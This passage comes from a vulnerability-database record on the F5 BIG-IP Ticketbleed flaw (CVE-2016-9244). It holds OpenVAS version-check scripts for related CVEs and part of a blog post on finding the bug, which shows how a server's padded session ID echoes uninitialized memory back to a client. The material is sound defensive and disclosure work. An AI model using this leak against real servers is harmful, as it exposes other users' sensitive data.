MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140192\");\n script_cve_id(\"CVE-2016-2182\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - OpenSSL vulnerability CVE-2016-2182\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K01276005\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors.\");\n\n script_tag(name:\"impact\", value:\"This vulnerability allows unauthorized disclosure of information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 09:42:43 +0100 (Fri, 17 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n 
script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '11.6.1_HF2;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-07T18:32:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9256", "CVE-2016-9244"], "description": "Permissions enforced by iControl can lag behind the actual permissions assigned to a user if the 
role_map is not reloaded between the time the permissions are changed and the time of the user's next request. This is a race condition that occurs rarely in normal usage. The typical period in which this is possible is limited to at most a few seconds after the permission change.", "modified": "2020-04-03T00:00:00", "published": "2017-03-17T00:00:00", "id": "OPENVAS:1361412562310140194", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140194", "type": "openvas", "title": "F5 BIG-IP - iControl vulnerability CVE-2016-9256", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - iControl vulnerability CVE-2016-9256\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140194\");\n script_cve_id(\"CVE-2016-9256\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - iControl vulnerability CVE-2016-9256\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K47284724\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Permissions enforced by iControl can lag behind the actual permissions assigned to a user if the role_map is not reloaded between the time the permissions are changed and the time of the user's next request. This is a race condition that occurs rarely in normal usage. 
The typical period in which this is possible is limited to at most a few seconds after the permission change.\");\n\n script_tag(name:\"impact\", value:\"When an iControl user has administrative\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 10:25:58 +0100 (Fri, 17 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;11.2.1;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;11.2.1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;11.2.1;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;11.2.1;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;11.2.1;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;' );\n\nif( report = f5_is_vulnerable( 
ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-04-07T18:32:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7124", "CVE-2016-9244"], "description": "ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.", "modified": "2020-04-03T00:00:00", "published": "2017-03-07T00:00:00", "id": "OPENVAS:1361412562310140178", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140178", "type": "openvas", "title": "F5 BIG-IP - PHP vulnerability CVE-2016-7124", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - PHP vulnerability CVE-2016-7124\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140178\");\n script_cve_id(\"CVE-2016-7124\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - PHP vulnerability CVE-2016-7124\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K54308010\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may be able to cause a denial of service (DoS) or other unspecified impact by way of\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 10:25:29 +0100 (Tue, 07 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n 
script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-07T18:32:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7474", "CVE-2016-9244"], "description": "In some cases the MCPD binary cache may allow a user with Advanced Shell access, or privileges to generate a qkview, to temporarily obtain normally unrecoverable information.", "modified": "2020-04-03T00:00:00", "published": "2017-03-27T00:00:00", "id": "OPENVAS:1361412562310140221", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310140221", "type": "openvas", "title": "F5 BIG-IP - Article: K52180214 - MCPD vulnerability CVE-2016-7474", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - MCPD vulnerability CVE-2016-7474\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140221\");\n script_cve_id(\"CVE-2016-7474\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - Article: K52180214 - MCPD vulnerability CVE-2016-7474\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K52180214\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n 
script_tag(name:\"summary\", value:\"In some cases the MCPD binary cache may allow a user with Advanced Shell access, or privileges to generate a qkview, to temporarily obtain normally unrecoverable information.\");\n\n script_tag(name:\"impact\", value:\"A local user may have access to sensitive data such as passwords for recently created local user accounts and passphrases that have been set since the last reboot.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-27 12:41:02 +0200 (Mon, 27 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! 
version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.4.0-11.6.1;11.2.1;',\n 'unaffected', '11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "filippoio": [{"lastseen": "2017-06-30T16:13:04", "bulletinFamily": "blog", "cvelist": ["CVE-2016-9244"], "description": "Ticketbleed (CVE-2016-9244) is a software vulnerability in the TLS stack of certain F5 products that allows a remote attacker to extract up to 31 bytes of uninitialized memory at a time, which can contain any kind of random sensitive information, like in Heartbleed.\n\nIf you suspect you might 
be affected by this vulnerability, you can find details and mitigation instructions at [ticketbleed.com](<https://ticketbleed.com>) (including an online test) or in the [F5 K05121675 article](<https://support.f5.com/csp/article/K05121675>).\n\n\n\nIn this post we'll talk about how Ticketbleed was found, verified and reported.\n\n## JIRA RG-XXX\n\nIt all started with a bug report from a customer using Cloudflare [Railgun](<https://www.cloudflare.com/website-optimization/railgun/>).\n\n> **rg-listener <> origin requests fail with \"local error: unexpected message\"**\n> \n> A PCAP of the rg-listener <> origin traffic is attached and shows a TLS alert being triggered during the handshake.\n> \n> Worth noting the customer is using an F5 Load Balancer in front of the Railgun and the Origin Web Server: `visitor > edge > cache > rg-sender > F5 > rg-listener > F5 > origin web server`\n> \n> Matthew was unable to replicate by using a basic TLS.Dial in Go so this seems tricky so far.\n\nA bit of context on Railgun: Railgun speeds up requests between the Cloudflare edge and the origin web site by establishing a permanent optimized connection and performing delta compression on HTTP responses.\n\n\n\nThe Railgun connection uses a custom binary protocol over TLS, and the two endpoints are Go programs: one on the Cloudflare edge and one installed on the customer servers. This means that the whole connection goes through the Go TLS stack, crypto/tls.\n\nThat connection failing with `local error: unexpected message` means that the customer\u2019s side of the connection sent something that confused the Go TLS stack of the Railgun running on our side. 
Since the customer is running an F5 load balancer between their Railgun and ours, this points towards an **incompatibility between the Go TLS stack and the F5 one**.\n\nHowever, when my colleague Matthew tried to reproduce the issue by connecting to the load balancer with a simple Go `crypto/tls.Dial`, it succeeded.\n\n## PCAP diving\n\nSince Matthew sits at a desk opposite of mine in the Cloudflare London office, he knew I've been working with the Go TLS stack for our TLS 1.3 implementation. We quickly ended up in a joint debugging session.\n\nHere's the PCAP we were staring at.\n\n\n\nSo, there's the ClientHello, right. The ServerHello, so far so good. And then immediately a ChangeCipherSpec. Oh. Ok.\n\nA ChangeCipherSpec is how TLS 1.2 says \"let's switch to encrypted\". The only way a ChangeCipherSpec can come this early in a 1.2 handshake, is if session resumption happened.\n\nAnd indeed, by focusing on the ClientHello we can see that the Railgun client sent a Session Ticket.\n\n\n\nA Session Ticket carries some encrypted key material from a previous session to allow the server to resume that previous session immediately instead of negotiating a new one.\n\n\n\n_To learn more about session resumption in TLS 1.2, watch the first part of [the Cloudflare Crypto Team TLS 1.3 talk](<https://blog.cloudflare.com/tls-1-3-explained-by-the-cloudflare-crypto-team-at-33c3/>), [read the transcript](<https://blog.cloudflare.com/tls-1-3-overview-and-q-and-a/>), or the [\"TLS Session Resumption\" post](<https://blog.cloudflare.com/tls-session-resumption-full-speed-and-secure/>) on the Cloudflare blog._\n\nAfter that ChangeCipherSpec both Railgun and Wireshark get pretty confused (HelloVerifyRequest? Umh?). So we have reason to believe the issue is related to Session Tickets.\n\nIn Go you have to explicitly enable Session Tickets on the client side by setting a `ClientSessionCache`. 
We verified that indeed Railgun uses this functionality and wrote this small test:\n \n \n package main\n \n import ( \n \"crypto/tls\"\n )\n \n func main() { \n conf := &tls.Config{\n InsecureSkipVerify: true,\n ClientSessionCache: tls.NewLRUClientSessionCache(32),\n }\n \n conn, err := tls.Dial(\"tcp\", \"redacted:443\", conf)\n if err != nil {\n panic(\"failed to connect: \" + err.Error())\n }\n conn.Close()\n \n conn, err = tls.Dial(\"tcp\", \"redacted:443\", conf)\n if err != nil {\n panic(\"failed to resume: \" + err.Error())\n }\n conn.Close()\n }\n \n\nAnd sure enough, `local error: unexpected message`.\n\n## crypto/tls diving\n\nOnce I had it reproduced in a local `crypto/tls` it became a home game. `crypto/tls` error messages tend to be short of details, but a quick tweak allows us to pinpoint where they are generated.\n\nEvery time a fatal error occurs, `setErrorLocked` is called to record the error and make sure that all following operations fail. That function is usually called from the site of the error.\n\nA well placed `panic(err)` will drop a stack trace that should show us _what_ message is unexpected.\n \n \n diff --git a/src/crypto/tls/conn.go b/src/crypto/tls/conn.go \n index 77fd6d3254..017350976a 100644 \n --- a/src/crypto/tls/conn.go\n +++ b/src/crypto/tls/conn.go\n 
@@ -150,8 +150,7 @@ type halfConn struct {\n }\n \n func (hc *halfConn) setErrorLocked(err error) error {\n - hc.err = err\n - return err\n + panic(err)\n }\n \n // prepareCipherSpec sets the encryption and MAC states\n \n \n \n panic: local error: tls: unexpected message\n \n goroutine 1 [running]: \n panic(0x185340, 0xc42006fae0) \n /Users/filippo/code/go/src/runtime/panic.go:500 +0x1a1\n crypto/tls.(*halfConn).setErrorLocked(0xc42007da38, 0x25e6e0, 0xc42006fae0, 0x25eee0, 0xc4200c0af0) \n /Users/filippo/code/go/src/crypto/tls/conn.go:153 +0x4d\n crypto/tls.(*Conn).sendAlertLocked(0xc42007d880, 0x1c390a, 0xc42007da38, 0x2d) \n /Users/filippo/code/go/src/crypto/tls/conn.go:719 +0x147\n crypto/tls.(*Conn).sendAlert(0xc42007d880, 0xc42007990a, 0x0, 0x0) \n /Users/filippo/code/go/src/crypto/tls/conn.go:727 +0x8c\n crypto/tls.(*Conn).readRecord(0xc42007d880, 0xc400000016, 0x0, 0x0) \n /Users/filippo/code/go/src/crypto/tls/conn.go:672 +0x719\n crypto/tls.(*Conn).readHandshake(0xc42007d880, 0xe7a37, 0xc42006c3f0, 0x1030e, 0x0) \n /Users/filippo/code/go/src/crypto/tls/conn.go:928 +0x8f\n crypto/tls.(*clientHandshakeState).doFullHandshake(0xc4200b7c10, 0xc420070480, 0x55) \n /Users/filippo/code/go/src/crypto/tls/handshake_client.go:262 +0x8c\n crypto/tls.(*Conn).clientHandshake(0xc42007d880, 0x1c3928, 0xc42007d988) \n /Users/filippo/code/go/src/crypto/tls/handshake_client.go:228 +0xfd1\n crypto/tls.(*Conn).Handshake(0xc42007d880, 0x0, 0x0) \n /Users/filippo/code/go/src/crypto/tls/conn.go:1259 +0x1b8\n crypto/tls.DialWithDialer(0xc4200b7e40, 0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0x4ff80, 0xc420072000, 0xc42007d118) \n /Users/filippo/code/go/src/crypto/tls/tls.go:146 +0x1f8\n crypto/tls.Dial(0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0xc42007ce00, 0x0, 0x0) \n /Users/filippo/code/go/src/crypto/tls/tls.go:170 +0x9d\n \n\nSweet, let's see where the unexpected message alert is sent, at `conn.go:672`.\n \n \n 670 case recordTypeChangeCipherSpec:\n 671 if typ != want || 
len(data) != 1 || data[0] != 1 {\n 672 c.in.setErrorLocked(c.sendAlert(alertUnexpectedMessage))\n 673 break\n 674 }\n 675 err := c.in.changeCipherSpec()\n 676 if err != nil {\n 677 c.in.setErrorLocked(c.sendAlert(err.(alert)))\n 678 }\n \n\nSo the message we didn't expect is the ChangeCipherSpec. Let's see if the higher stack frames give us an indication as to what we expected instead. Let's chase `handshake_client.go:262`.\n \n \n 259 func (hs *clientHandshakeState) doFullHandshake() error {\n 260 c := hs.c\n 261\n 262 msg, err := c.readHandshake()\n 263 if err != nil {\n 264 return err\n 265 }\n \n\nAh, `doFullHandshake`. Wait. The server here is clearly doing a resumption (sending a Change Cipher Spec immediately after the Server Hello), while the client... tries to do a full handshake?\n\nIt looks like the client offers a Session Ticket, the server _accepts it_, but the client _doesn't realize and carries on_.\n\n## RFC diving\n\nAt this point I had to fill a gap in my TLS 1.2 knowledge. How does a server signal acceptance of a Session Ticket?\n\n[RFC 5077](<https://tools.ietf.org/html/rfc5077>), which obsoletes RFC 4507, says:\n\n> When presenting a ticket, the client MAY generate and include a Session ID in the TLS ClientHello. 
If the server accepts the ticket and the Session ID is not empty, then it MUST respond with the same Session ID present in the ClientHello.\n\nSo a client that doesn't want to guess whether a Session Ticket is accepted or not will send a Session ID and look for it to be echoed back by the server.\n\nThe code in `crypto/tls`, clear as always, does exactly that.\n \n \n func (hs *clientHandshakeState) serverResumedSession() bool { \n // If the server responded with the same sessionId then it means the\n // sessionTicket is being used to resume a TLS session.\n return hs.session != nil && hs.hello.sessionId != nil &&\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\n }\n \n\n## Session IDs diving\n\nSomething must be going wrong there. Let's practice some healthy print-based debugging.\n \n \n diff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go \n index f789e6f888..2868802d82 100644 \n --- a/src/crypto/tls/handshake_client.go\n +++ b/src/crypto/tls/handshake_client.go\n 
@@ -552,6 +552,8 @@ func (hs *clientHandshakeState) establishKeys() error {\n func (hs *clientHandshakeState) serverResumedSession() bool {\n // If the server responded with the same sessionId then it means the\n // sessionTicket is being used to resume a TLS session.\n + println(hex.Dump(hs.hello.sessionId))\n + println(hex.Dump(hs.serverHello.sessionId))\n return hs.session != nil && hs.hello.sessionId != nil &&\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\n }\n \n \n \n 00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.|\n \n 00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.| \n 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n \n\nAh. The F5 server is padding the Session ID to its maximum length of 32 bytes, instead of returning it as the client sent it. crypto/tls in Go uses 16 byte Session IDs.\n\nFrom there the failure mode is clear: the server thinks it told the client to use the ticket, the client thinks the server started a new session, and things get unexpected.\n\nIn the TLS space we have seen quite some incompatibilities like this. Notoriously, ClientHellos have to be either shorter than 256 bytes or longer than 512 [not to clash with some server implementations](<https://bugs.chromium.org/p/chromium/issues/detail?id=315828>).\n\nI was about to write this up as just another real world TLS quirk when...\n \n \n 00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%|\n \n 00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%| \n 00000010 04 27 a8 4f 63 22 de 8b ef f9 a3 13 dd 66 5c ee |.'.Oc\".......f\\.| \n \n\nUh oh. Wait. Those are not zeroes. That's not 